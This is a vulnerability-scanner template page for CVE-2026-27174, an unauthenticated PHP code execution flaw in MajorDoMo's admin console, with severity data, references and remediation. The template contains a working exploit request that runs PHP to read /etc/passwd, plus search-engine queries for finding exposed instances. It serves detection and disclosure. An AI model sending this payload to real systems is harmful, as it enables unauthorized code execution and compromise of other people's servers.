MajorDoMo - Unauthenticated RCE

CVE-2026-27174
Early Release

Description

MajorDoMo contains a remote code execution vulnerability caused by an include-order bug and a missing exit after redirect in the admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.

Severity

Critical

CVSS Score

10

Affected Product

majordomo

Published Date

April 20, 2026

Template Author

0x_akoko

CVE-2026-27174.yaml
id: CVE-2026-27174

info:
  name: MajorDoMo - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   MajorDoMo contains a remote code execution vulnerability caused by an include-order bug and a missing exit after redirect in the admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.
  remediation: |
   Update to the latest version, which fixes the include-order bug and adds a proper exit after redirect.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174
    - https://github.com/sergejey/majordomo/issues/1177
    - https://chocapikk.com/posts/2026/majordomo-revisited
    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 10.0
    cve-id: CVE-2026-27174
    cwe-id: CWE-94
    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sergejey
    product: majordomo
    fofa-query: body="templates/application.html"
    shodan-query: http.html:"templates/application.html"
  tags: cve,cve2026,rce,majordomo,php,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3156a05a1217f1ee455fa22ba34a6969d9b8c79a5ff8e2b94c0ff23b588df6e02206ba81d6dc48e8f9940b4ed3ac5516832b05f7f166069c7f4508f29aeff6d4fef:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE ID:
CVE-2026-27174
CWE ID:
CWE-94

References

https://nvd.nist.gov/vuln/detail/CVE-2026-27174
https://github.com/sergejey/majordomo/issues/1177
https://chocapikk.com/posts/2026/majordomo-revisited
https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval

Remediation Steps

Update to the latest version, which fixes the include-order bug and adds a proper exit after redirect.